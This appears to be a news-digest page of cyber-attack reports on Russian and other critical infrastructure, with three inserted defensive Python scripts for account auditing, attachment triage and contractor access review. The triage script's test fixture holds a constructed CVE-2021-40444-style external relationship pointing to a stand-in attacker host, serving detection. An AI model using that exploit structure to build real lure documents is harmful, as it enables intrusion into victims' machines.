Security of critical information infrastructure of the Russian Federation
Main article: Security of critical information infrastructure of the Russian Federation
2025
Hackers shut down US-wide emergency alert system
On November 25, 2025, Crisis24 confirmed a large-scale cyber attack on its OnSolve CodeRED platform, which provides emergency warning systems throughout the United States. The incident paralyzed the notification system for state and local authorities, police and fire departments. Read more here.
The infrastructure of the company serving six marine terminals in Russia was subjected to a large-scale DDoS attack
The Port Alliance company announced on its Telegram channel on November 13 that its digital infrastructure had been subjected to a large-scale DDoS attack combined with a simultaneous intrusion attempt from abroad. Read more here.
'Leave the station immediately': Hackers break into Los Angeles' transport IT infrastructure and put threats on subway screens
On October 21, 2025, a system of electronic display boards located near 6th Street and Vermont Avenue in Los Angeles was hacked. The attackers displayed an alarming message: "URGENT WARNING. LEAVE THE STATION IMMEDIATELY. RISK OF SELF-DETONATION." This caused panic among passers-by and passengers waiting for transport. Photographs from the scene soon began to appear in local media. Read more here.
The airline "KrasAvia" was attacked by hackers. The site has been down for several days
On September 18, 2025, KrasAvia Airlines reported a failure of its information systems. Because of the hacker intrusion, a number of services were disrupted and the air carrier's website was unavailable for several days. Read more here.
Linux ship management systems have been hacked in Iran. Dozens of tankers idle
At the end of August 2025, it became known that hackers had disabled communication systems on board dozens of Iranian oil tankers and cargo ships. This is one of the largest cyber attacks on the country's maritime sector. Read more here.
Hackers attack US industrials using fake nondisclosure agreements
Cybercriminals have launched a massive social engineering campaign against American industrial enterprises in critical global supply chains. The attackers use the MixShell malware, which runs exclusively in the RAM of infected devices and lets the intruders operate unnoticed by security tools. The new attack scheme was reported by Check Point Research experts in August 2025. Read more here.
Hackers stopped the work of hydroelectric power plants in Poland and told how they did it
In mid-August 2025, it became known that hackers had managed to disrupt the operation of a hydroelectric power station in Poland. As a result of the intrusion, the facility's control systems were damaged. Read more here.
Cyber espionage group PhantomCore attacked objects of Russian critical infrastructure
From May to July 2025, specialists from the Threat Intelligence department of the Positive Technologies Security Expert Center (PT ESC TI) found more than 180 infected systems in Russian organizations. Malicious activity came from the cybercriminal group PhantomCore and was directed exclusively at the Russian critical infrastructure. PT ESC TI experts identified the victims and notified them of cyber threats before unacceptable events occurred. PT reported this on August 18, 2025. Read more here.
The Russian Datahouse data center network was attacked by hackers. The main trunk router is damaged
The Russian Datahouse data center network was subjected to a coordinated cyber attack that corrupted the configuration of the main backbone router of the data network. The attack also affected the telecom operator Citytelecom; both companies are part of the Filanko group of companies. The incident occurred on the night of August 11, 2025, at about 01:00 Moscow time. Read more here.
Hackers announced the destruction of 7 thousand Aeroflot servers. Computers don't work, company can't refuel planes
On July 28, 2025, Aeroflot's IT infrastructure was subjected to a large-scale cyber attack. As a result of the hacker intrusion, the operation of the air carrier's computer systems was disrupted and dozens of flights were canceled. According to the Aviatorshchina Telegram channel, Aeroflot has no working computers and the company cannot refuel planes.
Responsibility for the hack was claimed by attackers from the Silent Crow group, who acted together with the Cyberpartisans BY hackers. According to the organizers of the attack, they were inside the corporate network of Aeroflot for a year, "methodically developing access" and "deepening to the very core of the infrastructure." As a result, cybercriminals were able to "obtain and unload the full array of databases" of flight history, as well as compromise all critical corporate systems, including CREW, Sabre, SharePoint, Exchange, KASUD, Sirax, CRM, ERP, 1C, DLP, etc. In addition, hackers claim that they gained control of employees' personal computers, including senior management. Data from servers was copied, in particular, audio recordings of telephone conversations.
| About 7,000 servers were destroyed - physical and virtual. The amount of information received is 12 TB of databases, 8 TB of files with Windows Share, 2 TB of corporate mail. All these resources are now unavailable or destroyed, recovery will require perhaps tens of millions of dollars, says Silent Crow. |
The Aeroflot website says that the airline's information systems failed. Passengers of canceled flights will be able to get a refund or reissue their tickets after services resume. According to reports, all employees were barred from using corporate mail and work computers until further notice. The Moscow Interregional Transport Prosecutor's Office, on behalf of the Prosecutor's Office of Russia, took control of the situation at Sheremetyevo Airport, where more than 80 flights were delayed and about 60 were canceled.[1]
Chinese APT group attacks Russian IT contractors with customized malicious utilities
At the end of February 2025, the Solar cyber security center at Rostelecom published the results of a study of the malicious tools that the Space Pirates/Erudite Mogwai group uses in attacks on Russian IT enterprises that provide services to the public sector. Read more here.
2024
Cyber attacks hit Russian government agencies using viruses disguised as "Google Tables"
The hacker group Cloud Atlas has begun using Google cloud services to carry out phishing attacks on Russian government agencies. This became known on December 16, 2024 from Positive Technologies data. Read more here.
APT group Cloud Atlas attacks the public sector of Russia and Belarus
A Russian state organization that discovered a phishing mailing turned to the threat response department of the Positive Technologies Expert Security Center for help. The investigation found that the incident is part of a campaign against government agencies in Russia and Belarus which specialists of the PT ESC threat research department have been monitoring since October 2024. Behind the cyber attacks is the APT group Cloud Atlas, which has been active for ten years. Positive Technologies announced this on December 12, 2024. Read more here.
Chinese hackers attack Russian public sector
In early August 2024, it became known that Chinese cybercriminal groups are attacking dozens of computer systems used in Russian government agencies and IT organizations. The malicious campaign, called EastWind, is aimed primarily at stealing official information.
Kaspersky Lab reports the detection of complex targeted attacks on Russian organizations. The analysis showed that for the initial infection of the victim's system, the attackers send emails with attached archives containing malicious shortcuts disguised as documents. Opening a shortcut triggers the installation of a Trojan that communicates with the cybercriminals through the Dropbox cloud storage.
One of the tools used in the campaign is an updated version of the CloudSorcerer backdoor. The attackers improved it by adding the ability to use the Russian social network LiveJournal as the initial command server, which provides additional masking.
In addition to CloudSorcerer, malicious modules used by the Chinese-speaking cyber groups APT27 and APT31 are being injected into computers. This malware has extensive functionality: it allows the attackers to steal files, monitor screen activity and record keystrokes on infected devices.
| During the detected attacks, malware was used by two groups that speak the same language - Chinese. This is a sign that these groups are working together, actively sharing knowledge and tools for attacks. As practice shows, such interaction allows advanced attackers to work more efficiently, Kaspersky Lab notes[2] |
FSTEC will oblige government agencies, banks and enterprises of the fuel and energy complex to store information about cyber attacks for 3 years
In early August 2024, it became known that the Federal Service for Technical and Export Control of the Russian Federation (FSTEC) had developed new requirements for the protection of information in government agencies and in organizations belonging to critical information infrastructure (CII): banks, enterprises of the fuel and energy complex, etc.
According to the Kommersant newspaper, the FSTEC document provides for a change in the requirements for the safe storage of data that do not constitute a state secret in government agencies and at KII facilities. Such organizations will need to implement antivirus protection of IT systems, ensure the prevention of intrusions into the infrastructure and control the protection of information in general. In addition, information systems of CII facilities must have the resources necessary to pass traffic twice the volume of conventional indicators.
In the event of a cyber threat, the participants of the market in question need to interact with the state system for detecting computer attacks, as well as with the hosting provider or organization providing communication services. Security threats in the document mean cyber attacks based on the DDoS model.
The new rules also suggest that organizations will have to store information about cyber incidents for three years. Such information should include the date and time when the attack began and ended, the type of threat, its intensity (Gbps), the list of network addresses that are the source of threats, and the protection measures that have been taken.
The general director of the hosting provider RUVDS, Nikita Tsaplin, believes that the proposed measures are necessary for the market, since DDoS attacks have become a regular phenomenon. However, implementing the requirements may lead to additional costs for companies because of the need to upgrade hardware and software systems.[3]
Hackers attacked the public sector and companies in Russia through hacked elevator systems
On July 8, 2024, it became known about a large-scale cyber attack on the public sector and companies in Russia, carried out through hacked elevator control systems. The hacker group Lifting Zmiy from Eastern Europe exploited vulnerabilities in SCADA system controllers to penetrate the IT infrastructure of various organizations. Read more here.
Russian state and financial companies are attacked by a new cyber group Lazy Koala
In early April 2024, the information security company Positive Technologies announced the identification of a new hacker group called Lazy Koala, which attacks state and financial companies, as well as medical and educational institutions. Read more here.
"Cyber detectors" from India attacked the Russian oil and gas company
At the end of March 2024, the company Perspective Monitoring (JSC PM) published a report entitled "Slumdog millionaires"[4] that revealed the details of an investigation into one spam attack. The company's experts found that their customers had begun receiving emails with a malicious attachment in early 2024. According to the Perspective Monitoring experts, the attack affected the infrastructure of a large Russian oil and gas company. Each of the emails included the cloudsecure[.]live domain, which, as it turned out during the investigation, is associated with the Indian cyber group CyberRoot.
| Basically, the attacks of this group were directed against individuals, - explained Anna Khromova, system analyst at Perspective Monitoring. - They tried to find out some confidential information about them in order to further gain access to the infrastructure of the company itself. |
The investigation found that CyberRoot employees posed as journalists, business leaders and media personalities in order to gain the trust of their victims. At the same time, they studied information from the social networks of the victim's subscribers, friends and family members in order to create credible fake accounts, with which they extracted the information needed for the attack.
The Perspective Monitoring report says that the group's main tool is phishing, aimed at stealing the credentials of the victim company's executives using malware. The attack ends with spyware installed on the mobile devices of the company's management, which secretly records events taking place on the phone and sends them to the developer's command server. The data collected with such tools is also used to penetrate the infrastructure of the company they manage.
However, while studying the CyberRoot infrastructure, it was discovered that it is part of a broader international attack infrastructure associated with the Indian spyware developer Appin. In addition to the companies already named, the sphere of influence of the Indian spyware developers also includes organizations such as Rebsec, BellTrox and DarkBasin.
Appin became widely known in November 2023, when SentinelOne, together with Reuters, published detailed reviews[5] of the activities of the company and its subsidiaries. According to international researchers, Appin was founded in 2003 and developed spyware for private detectives from the USA, Great Britain, Switzerland and other countries. The company's tools, called My Commando, made it possible to hack the mail, desktops and mobile devices of victims for further exploitation. However, on December 22 of that year, both reports (the technical one by SentinelOne and the political one by Reuters) were withdrawn from publication at the request of Appin's lawyers.
Information about the Appin group had, however, first been published back in 2011, after its infrastructure was hacked by the group Tigers of Indian Cyber. Its representatives claimed that Appin used students taking its courses to create phishing pages.
After the public disclosure of information, the group announced the termination of its activities in 2012. However, in fact, active renaming of companies and the creation of various subsidiaries in the group began. So, in 2012, Rebsec was created, and CyberRoot and BellTrox - in 2013. However, Appin Software Security itself was first renamed Approachinfinite Computer and Security Consulting Grp in 2014, and Adaptive Control Security Global Corp. in 2015. Appin Technology Pvt became Mobile Order Management private limited in 2015 and Sunkissed Organic Farms a year later.
FSTEC named 6 main reasons for successful cyber attacks on enterprises and government agencies
In mid-February 2024, the Federal Service for Technical and Export Control (FSTEC) listed six main reasons for successful hacker attacks on enterprises and government agencies:
- weak user and administrator passwords;
- single-factor authentication;
- use of default passwords;
- active accounts of dismissed employees;
- use of employees' personal devices to access the information infrastructure;
- use of personal messengers and social networks at workplaces.
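The first five shortcomings in this list are properties of individual accounts and can be checked mechanically against a directory export. The script below is an added example, not from FSTEC or the original page; the `Account` record format, the 12-character minimum and the default-password list are assumptions, and the password hashes are unsalted only to keep the example short. The sixth item, personal messengers and social networks at workplaces, is a network-level observation (proxy or firewall logs) rather than an account attribute, so it is not covered here.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Account:
    """Hypothetical account record as exported from a directory or IAM system."""
    username: str
    is_admin: bool
    enabled: bool
    mfa_enabled: bool
    password_sha256: str       # hash of the current password (unsalted here to keep the example short)
    password_length: int
    employee_dismissed: bool   # True once HR has recorded the person as dismissed
    last_device_managed: bool  # was the last login made from a company-managed device?


MIN_PASSWORD_LENGTH = 12  # assumed local policy, not a figure from FSTEC

# Constructed list of vendor-default and trivially guessable passwords; a real audit
# would take this from the vendor documentation of the deployed products.
KNOWN_DEFAULT_PASSWORDS = ["admin", "password", "123456", "Admin123", "changeme"]
DEFAULT_HASHES = {hashlib.sha256(p.encode()).hexdigest() for p in KNOWN_DEFAULT_PASSWORDS}


def sha256_hex(password):
    return hashlib.sha256(password.encode()).hexdigest()


def audit_account(acct):
    """Return the FSTEC-style shortcomings that apply to one account, in a fixed order."""
    findings = []
    if acct.password_sha256 in DEFAULT_HASHES:
        findings.append("default-password")
    elif acct.password_length < MIN_PASSWORD_LENGTH:
        findings.append("weak-password")
    if not acct.mfa_enabled:
        findings.append("single-factor-authentication")
    if acct.employee_dismissed and acct.enabled:
        findings.append("dismissed-employee-account-active")
    if acct.enabled and not acct.last_device_managed:
        findings.append("personal-device-access")
    return findings


def audit_accounts(accounts):
    """Map username -> findings, listing admin accounts first so they are remediated first."""
    ordered = sorted(accounts, key=lambda a: (not a.is_admin, a.username))
    return {a.username: f for a in ordered if (f := audit_account(a))}


# Constructed sample export: one clean account and three with problems.
SAMPLE_ACCOUNTS = [
    Account("ivanov", False, True, True, sha256_hex("Correct-Horse-Battery-42"), 24, False, True),
    Account("petrov_admin", True, True, False, sha256_hex("Admin123"), 8, False, True),
    Account("sidorova", False, True, True, sha256_hex("summer2024"), 10, True, True),
    Account("contractor1", False, True, False, sha256_hex("Long-Enough-Passphrase!"), 23, False, False),
]

if __name__ == "__main__":
    for user, findings in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{user}: {', '.join(findings)}")
```

The default-password check is deliberately placed before the length check: a short password that is also a vendor default is reported as the more serious finding only once. In a real deployment the comparison would be done against the salted hashes the directory actually stores, and the dismissed-employee flag would come from an HR feed rather than a hand-maintained field.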
| The results of the analysis of computer incidents, which, unfortunately, we have had over the past two years, made it possible to form a rating of the main shortcomings, which very often become prerequisites for the successful implementation of computer attacks, - said Sergey Bondarenko, head of the FSTEC department, speaking about the reasons why IT systems of companies and government agencies are most often hacked. |
According to Bondarenko, in order to create reliable cyber protection at enterprises and government agencies, it is necessary to inventory information resources, install antivirus programs, protect the perimeter of the information infrastructure and control mail attachments for malicious software.
In mid-February 2024, Russian Deputy Head of the Ministry of Digital Development Alexander Shoitov said that attacks on critical information infrastructure and state systems of the Russian Federation, including banks, had become more complicated. Often hackers, hiding behind simple DDoS attacks, conduct several more to further negatively affect IT systems.
| "We don't even always see," said Shoitov, speaking at one of the conferences on information security.[6] |
2023
Increase in the number of cyber attacks on critical information infrastructure facilities in Russia by 16%
The number of cyber attacks on critical information infrastructure (CII) facilities in Russia in 2023 increased by 16% compared to 2022. This is evidenced by the data of the National Coordination Center for Computer Incidents (NCCCI), which became known in May 2024.
According to Kommersant, citing materials from the center, about a third of KII owner organizations have vulnerable resources in their infrastructure. The most common reason is the use of foreign software without technical support and updates.
| "If we analyze the cases of compromise in closed sessions with the NCCC, it turns out that only a small part of the attacks on KII is associated with complex targeted computer attacks at the level of the capabilities of foreign special services," says Pavel Boglay, head of the cybersecurity department of Kryptonit. |
According to him, the largest number of attacks on CII objects occurs using DDoS attacks, the use of Trojan viruses, as well as when exploiting the human factor (identical passwords, sending important data through third-party instant messengers, etc.).
Experts of the information security company Solar note that the attackers have begun to carefully prepare for attacks, making them more targeted and complex. Also, hackers are actively using cyber intelligence and social engineering tools in the preparation and development of the attack, the group added.
According to a study by Angara Security specialists, about 40% of attacks on the IT infrastructure of departments and CII objects are associated with malicious software, phishing and DDoS attacks on network equipment, sites and servers.
The head of the InfoWatch ARMA product development department, Demid Balashov, stressed that the important conditions for ensuring cyber protection of the CII object are planning the most secure IT infrastructure, creating a defense architecture, applying the Secure-by-Design approach to minimize vulnerabilities and reducing the surface for attacks.[7]
FSB detained a Russian citizen who joined a Ukrainian cyber unit to attack Russian KII
FSB officers of the Russian Federation detained in the city of Belovo, Kemerovo Oblast, a Russian citizen who conducted illegal activities against the security of the Russian Federation. The detainee was charged with committing a crime under Art. 275 of the Criminal Code of Russia (high treason in the form of providing other assistance to a foreign organization), a preventive measure was chosen in the form of detention. Information about this was published on the official website of the FSB in a message dated October 31, 2023.
It was established that the detainee, via an Internet messenger, joined a cyber unit operating in the interests of the Ukrainian intelligence services, which carried out computer attacks using malicious software on Russian information resources, leading to disruption of the operability of the country's critical infrastructure facilities.
According to the FSB, investigative actions and operational-search measures were carried out in the addresses of residence and work of the defendant in the criminal case, as well as his connections, during which computer equipment and communications were seized, data were obtained confirming his anti-Russian activities.[8]
The most powerful hacker attack fell on the Russian public sector
In the summer of 2023, a powerful hacker attack hit the public sector. On October 24, 2023, Kaspersky Lab told about it.
According to experts from the Russian antivirus company, the attackers used phishing emails to steal data from organizations with a new backdoor. It ran a malicious NSIS script (.nsi), which used several modules to try to steal data from the infected device.
| "Phishing emails are one of the popular ways for attackers to penetrate the infrastructure. Attackers, as in this case, seek to use plausible legends and legitimate documents and use increasingly complex tactics to hide their activities. Thus, the execution of malicious code using a .nsi script complicates the analysis of malicious activity," said Timofey Yezhov, an expert on cybersecurity at Kaspersky Lab. |
As Kaspersky Lab explained, after launch the malware checks for Internet access by trying to connect to legitimate web resources (foreign media). It then checks the infected device for software and tools that could detect its presence, such as sandboxes or virtual environments; if it finds at least one, the backdoor stops its activity. Once all the checks pass, the malware connects to the attackers' server and loads modules that let it steal information from the clipboard, take screenshots and find user documents with popular extensions (for example .doc, .docx, .pdf, .xls, .xlsx). All data is transferred to the command server.
In mid-August 2023, a second wave of mailings was discovered. The researchers reported that the attackers made some changes to their system, but the infection chain and the bootloader script remained unchanged. It is unclear whether any organisation was affected by these two waves of mailings.[9]
Reuters: IT systems of Russian missile developer NPO Mechanical Engineering hacked by hackers from North Korea
On August 7, 2023, it became known that hackers from North Korea hacked into the IT systems of the Russian company NPO Mechanical Engineering. This enterprise is engaged in the development, production and modernization of complexes of strategic and tactical aviation high-precision weapons of the air-to-surface, air-to-air classes and unified systems of naval weapons, domestic rocket and space technology and electronic equipment. Read more here.
Rostov hacker sentenced to two years in prison for attacks on the websites of banks, fuel and energy complex and telecom companies
On July 4, 2023, the Zheleznodorozhny District Court of Rostov-on-Don sentenced Russian Ivan Bayandin to two years in prison for hacker attacks on the critical information infrastructure of the Russian Federation (KII). Read more here.
Russian Railways website and application not working for three days due to hacker attack
On July 3, 2023, failures began to occur in the work of the official website and mobile application of Russian Railways. The company confirmed the problems, saying that the computer infrastructure was subjected to a hacker attack. Read more here.
The Russian satellite operator Dozor-Teleport was attacked by hackers. There are failures in its work
At the end of June 2023, the Russian satellite operator Dozor-Teleport was attacked by hackers. There are failures in its work. Read more here.
Details of cyber attacks on Russian defense industry enterprises through Microsoft Office revealed
Positive Technologies experts Denis Kuvshinov and Maxim Andreev, with the participation of the Incident Response and Threat Intelligence teams of the PT Expert Security Center, prepared a detailed report analyzing a Trojan they named MataDoor. The Trojan had previously been spotted in Malwarebytes and Kaspersky Lab reports, where it was named MATAv5 and attributed to the activities of the Lazarus hacker group. Positive Technologies experts obtained a sample at one of the defense industry enterprises in the fall of 2022.
The experts tentatively associate the initial vector of malware penetration into the enterprise infrastructure with the exploitation of the CVE-2021-40444 vulnerability in a Microsoft Internet Explorer component. Unfortunately, the same component is used by Microsoft Office applications, which makes it possible to craft an exploit that downloads and executes malicious code on the victim's machine. For the attack to succeed, the victim needs to download a DOCX document and open it for editing in Microsoft Office.
According to the researchers, emails containing documents with exploits for CVE-2021-40444 were sent to Russian enterprises of the military-industrial complex in August-September 2022. Some of them were related in content to the field of activity of the attacked enterprises; others were composed simply to attract the addressee's attention. Earlier, in September 2021, Malwarebytes had recorded and investigated similar mailings, but with a different exploit.
Emails carrying the CVE-2021-40444 exploit must prompt the user to enable the document editing mode, which is a prerequisite for the exploit to trigger. These emails used a specific design of the text that was meant to encourage the user to turn on editing mode and change the font color to a more contrasting one. Once editing mode is enabled, malicious code is downloaded and executed from a resource controlled by the attackers. Therefore, if your employees received and viewed emails with low-contrast or otherwise inconvenient formatting, it is worth examining your infrastructure using the indicators of compromise that the researchers published in the report.
It should be noted that MataDoor is designed for long-term hidden operation in a compromised system. Its files are named similarly to legitimate software installed on the infected devices. In addition, a number of samples carried a valid digital signature. The identified executables and libraries were also processed with the Themida protector to complicate analysis and detection.
The malware itself is a modular Trojan consisting of a kernel (orchestrator) and modules (plugins), which do all the actual work of the malware depending on which computer it is installed on. MataDoor also provides infrastructure for its modules to transfer data to the control server and asynchronously execute commands loaded from it. Thus, MataDoor can be used both to steal valuable, secret or personal information and to introduce eavesdropping and tracking components and logic bombs. The damage caused by the detected malware and its relatives is still difficult to assess; in each individual case a thorough investigation must be carried out.
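Both lures on this page that arrive as mail attachments can be triaged before they reach a user: the EastWind archives described above (shortcuts disguised as documents) and the CVE-2021-40444 documents described here. The Python script below is an added example, not code from Positive Technologies, Kaspersky Lab or the original page. The DOCX check relies on the publicly documented structure of CVE-2021-40444 documents, an oleObject relationship in the package whose target is marked external and points at an attacker-controlled URL, which the page itself does not spell out; the sample archive, the sample documents and the attacker.invalid domain are constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Document-like extensions that a .lnk may be disguised as (EastWind-style lure).
DOCUMENT_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".txt")

# OOXML relationship namespace and the relationship type used to embed OLE objects.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_lnk_lures(archive_bytes):
    """List .lnk entries in a ZIP; a .lnk whose stem ends in a document extension is a lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if not lower.endswith(".lnk"):
                continue
            stem = lower[:-len(".lnk")]
            kind = "lnk-disguised-as-document" if stem.endswith(DOCUMENT_EXTS) else "lnk-in-archive"
            findings.append((name, kind))
    return findings


def find_external_ole_relationships(docx_bytes):
    """List (rels file, target) pairs where an oleObject relationship points outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_OBJECT_REL:
                    hits.append((name, rel.get("Target", "")))
    return hits


def triage_attachment(filename, data):
    """Return (rule, detail) findings for one attachment; non-ZIP payloads are left to other scanners."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    lower = filename.lower()
    if lower.endswith(".docx"):
        return [("external-oleobject", f"{rels}: {target}")
                for rels, target in find_external_ole_relationships(data)]
    if lower.endswith(".zip"):
        return [(kind, name) for name, kind in find_lnk_lures(data)]
    return []


# --- Constructed samples (no real malware involved) ---------------------------------
def _build_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Lure archive: a shortcut named like a document next to a harmless text file.
SAMPLE_ARCHIVE = _build_zip({"Contract_2024.docx.lnk": b"L\x00\x00\x00", "readme.txt": b"see attached"})


def _rels_xml(extra=""):
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="' + REL_NS + '">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            + extra + '</Relationships>')


# Relationship shaped like the CVE-2021-40444 pattern, pointing at a constructed domain.
EXTERNAL_OLE_REL = ('<Relationship Id="rId2" Type="' + OLE_OBJECT_REL + '" '
                    'Target="mhtml:http://attacker.invalid/lure.html!x-usc:http://attacker.invalid/lure.html" '
                    'TargetMode="External"/>')


def _build_docx(rels_xml):
    return _build_zip({"[Content_Types].xml": "<Types/>",
                       "word/document.xml": "<document/>",
                       "word/_rels/document.xml.rels": rels_xml})


SAMPLE_BENIGN_DOCX = _build_docx(_rels_xml())
SAMPLE_EXPLOIT_DOCX = _build_docx(_rels_xml(EXTERNAL_OLE_REL))

if __name__ == "__main__":
    for fname, blob in [("docs.zip", SAMPLE_ARCHIVE), ("clean.docx", SAMPLE_BENIGN_DOCX), ("invoice.docx", SAMPLE_EXPLOIT_DOCX)]:
        print(fname, triage_attachment(fname, blob))
```

The relationship check is deliberately narrow: external targets are legitimate for hyperlinks and some linked images, so only the oleObject relationship type is flagged, which keeps false positives low while still catching the document structure the exploit depends on. A mail gateway would run `triage_attachment` on each attachment and quarantine any message with findings for analyst review.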
The FSB Cyber Security Center records the growth of cyber attacks through IT contractors. What is recommended to do
The National Coordination Center for Computer Incidents (NCCC), subordinate to the FSB, calls cyber attacks on the information systems of government agencies and subjects of critical information infrastructure (CII) through the supply chain, that is, through the IT infrastructure of contractors, one of the key trends of 2023.
NKCKI expert Andrei Rayevsky, speaking at an international conference on information security on June 6, explained that an IT contractor often develops and hands over a project but still retains administrator rights for author supervision or further support of the system. There is a tendency to penetrate the infrastructure of government agencies and KII entities through these administrative rights of the IT contractor.
At the same time, at the legislative level, there are no requirements in the field of information security for the information systems of such contractors. According to the expert, the NKCKI is thinking about providing for requirements at the legislative level, first of all, for IT contractors performing work for government agencies and KII entities.
NCCC, for its part, recommends that customers, within the framework of technical assignments for IT projects, prescribe requirements for the information security of contractors' IT resources. And some serious organizations are already doing this, notes Andrei Rayevsky.
In addition, NCCCA recommends limiting the number of privileged users from among contractors who are assigned to their systems.
There are domestic developments in the market in the field of privileged access tools. Their use becomes very relevant. NKCKI believes that it is worth taking a closer look at these developments.
It is also necessary to monitor for reports of leaks and computer incidents at contractors, and when such leaks concern the customer's own information resources, to require the developers to respond and investigate the causes.
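The NCCC recommendations above (limit the number of privileged contractor users, tie access to the support period, watch for incidents at contractors) can be turned into a periodic access review. The script below is an added example, not NCCC guidance or code from the original page; the `PrivilegedGrant` record, the cap of two privileged accounts per contractor, the 90-day staleness threshold, the review date and the inventory are all constructed assumptions.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class PrivilegedGrant:
    """Hypothetical record of one privileged account held by a contractor on a customer system."""
    account: str
    contractor: str            # contracting organisation the account belongs to
    system: str
    privilege: str             # e.g. "app-admin", "db-admin", "domain-admin"
    contract_end: date         # end of the support / author-supervision period
    enabled: bool
    last_used: Optional[date]  # None if the account has never logged in


MAX_PRIVILEGED_PER_CONTRACTOR = 2  # assumed local policy, not an NCCC figure
STALE_DAYS = 90                    # assumed: unused privileged access should be removed


def review_contractor_access(grants, today, breached_contractors=frozenset()):
    """Return (subject, finding) pairs for enabled contractor grants that need action."""
    findings = []
    per_contractor = {}
    for g in grants:
        if not g.enabled:
            continue  # already disabled accounts need no action
        if g.contract_end < today:
            findings.append((g.account, "privileged-access-beyond-contract-end"))
        if g.last_used is None or (today - g.last_used).days > STALE_DAYS:
            findings.append((g.account, "stale-privileged-account"))
        if g.contractor in breached_contractors:
            findings.append((g.account, "contractor-reported-compromise-rotate-credentials"))
        per_contractor.setdefault(g.contractor, []).append(g.account)
    # Cap on standing privileged accounts per contractor (counted on enabled grants only).
    for contractor, accounts in sorted(per_contractor.items()):
        if len(accounts) > MAX_PRIVILEGED_PER_CONTRACTOR:
            findings.append((contractor, f"too-many-privileged-accounts:{len(accounts)}"))
    return findings


REVIEW_DATE = date(2023, 6, 6)  # constructed review date

# Constructed inventory of contractor privileged accounts.
SAMPLE_GRANTS = [
    PrivilegedGrant("svc_integrator_1", "IntegratorA", "portal", "app-admin", date(2023, 12, 31), True, date(2023, 6, 1)),
    PrivilegedGrant("svc_integrator_2", "IntegratorA", "portal", "db-admin", date(2022, 12, 31), True, date(2023, 5, 20)),
    PrivilegedGrant("svc_integrator_3", "IntegratorA", "erp", "domain-admin", date(2023, 12, 31), True, None),
    PrivilegedGrant("svc_vendor_b", "VendorB", "scada", "admin", date(2024, 1, 1), True, date(2023, 6, 5)),
    PrivilegedGrant("svc_old", "VendorC", "hr", "db-admin", date(2021, 1, 1), False, date(2020, 12, 1)),
]

# Constructed: VendorB has publicly reported an incident on its own infrastructure.
BREACHED_CONTRACTORS = frozenset({"VendorB"})

if __name__ == "__main__":
    for subject, finding in review_contractor_access(SAMPLE_GRANTS, REVIEW_DATE, BREACHED_CONTRACTORS):
        print(f"{subject}: {finding}")
```

The `breached_contractors` input is where the last recommendation plugs in: a feed of contractor incident reports turns into an immediate credential-rotation task for every privileged account that contractor holds, instead of waiting for the next scheduled review. The contract-end check is what enforces the point that author-supervision rights must expire with the support period rather than persist indefinitely.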
The number of cyber attacks on the IT infrastructure of Russian Railways in 2 years has grown 20 times
The number of cyber attacks on the IT infrastructure of Russian Railways in January-November 2023 exceeded 600 thousand, 20 times more than in 2021. These figures were cited by Dmitry Skachkov, Director of the Digital Development Department of the Ministry of Transport, at a roundtable on the security of critical information infrastructure facilities in transport, organized by the Federation Council Committee on Constitutional Legislation and State Construction. Read more here.
The number of cyber attacks through contractors has grown 2 times. National Center for Computer Incidents - on the main trends of 2022
The National Coordination Center for Computer Incidents (NCCCA) states that the situation in the Russian information space in 2022 was significantly influenced by the conduct of the SVO in Ukraine. An "unprecedented in scale" cyber campaign was launched against Russia, the main goals of which are to disable the information infrastructure and unauthorized access to the IT systems of organizations and enterprises of various sectors of the critical information infrastructure of the Russian Federation. At an industry event on February 7, NKCKI Deputy Director Nikolai Murashov summed up key trends in the field of cyber threats for 2022.
The number of computer attacks on objects of the Russian information infrastructure in 2022 increased significantly. At the same time, there is an increase in the speed of implementation of threats: from the moment information about threats appears - for example, the publication of information about vulnerabilities - it sometimes takes only a few hours to practical implementation.
Increasing the availability of hacker tools: specialized resources regularly publish the source codes of attack software, as well as detailed information about computer incidents for their further analysis.
There are "politicized unfriendly actions" by the international cyber community. Thus, FIRST (Forum of Incident Response and Security Teams), the international community for responding to cyber threats, has stopped working with Russian computer incident response centers. According to Nikolai Murashov, this decision confirms the concern expressed earlier by the NCCCI about the declarative approach of some countries to the task of creating a peaceful, stable and secure ICT environment.
In 2022, the number of attacks through the supply chain increased: integrators, security vendors, service providers and other business partners. According to the information available to the NCCCI, the number of attacks through contractors doubled over the year. Having gained access to the contractor's infrastructure, the attackers find themselves inside the target system.
In 2022, massive attacks on root DNS servers, disconnection of providers from major backbone channels, embedding of malware in widely used web page components, and the appearance of malicious code in software updates, both freely distributed and commercial, were recorded.
A feature of DDoS attacks in recent months has been the very large number of participants. Telegram channels were quickly formed in which ordinary people were recruited, participants were instructed, targeting was coordinated, and attack tools were distributed.
At the same time, many DDoS attacks served as cover for more serious impacts. Many computer attacks were aimed at stealing information from organizations' systems and disrupting technological processes.
One of the trends was ransomware attacks to extort a ransom. As targets, attackers chose solvent organizations in which data encryption could disrupt core business processes. For this reason they showed interest in large companies, including industrial enterprises.
